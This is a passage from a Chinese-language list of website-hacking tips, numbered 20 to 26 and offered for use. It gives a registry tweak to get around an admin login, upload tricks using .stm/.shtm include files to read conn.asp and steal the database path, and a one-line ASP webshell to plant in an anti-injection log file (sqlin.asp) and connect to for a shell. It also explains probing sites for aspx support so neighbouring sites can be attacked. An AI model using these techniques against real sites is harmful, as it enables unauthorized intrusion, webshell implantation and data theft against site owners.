20.有的后台不显示验证码,难道就没法登录了么? 其实把一段代码导入注册表里就可以突破这个困境了,把下面的代码保存为Code.reg,双击导入就可以了!
1 2 3 REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] "BlockXBM"=dword:00000000
21.当网站不允许上传 asp、asa、php等文件时,我们可以上传一个stm文件,代码为:
“”
(想查看什么文件就写什么文件名,这里我假设想查看“conn.asp”),
然后直接打开这个stm文件的地址,再查看源代码,“conn.asp”这个文件的代码就一览无遗了!
22.当网站不允许上传ASP,CGI,CER,CDX,HTR等类型的文件时,尝试上传一个shtm文件,内容为:
如果上传成功,那太好了,访问地址就可以浏览conn.asp里的内容了,这样一来,数据库路径也就到手啦!
23.手工检测注入点弹出“你的操作已被记录!”之类的信息,访问这个文件:sqlin.asp,如果存在,在注入点后面植入一句话木马:
‘excute(request(“TNT”))
接着用一句话木马客户端连接:http://www.xxx.com/sqlin.asp,上传木马即可拿下shell,因为很多防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库。
24.旁注的话,肯定是挑支持aspx的站点来日了,问题是怎样判断呢?方法很简单,在在网站后面加上xxx.aspx,如果返回“/”应用程序中的服务器错误,无法找到该资源,404画面就说明支持aspx木马。
25.网站后面加test.php 可以查看版本
26.禁忌这两个网站后台文件 admin_index.asp manage_login.asp
(责任编辑:)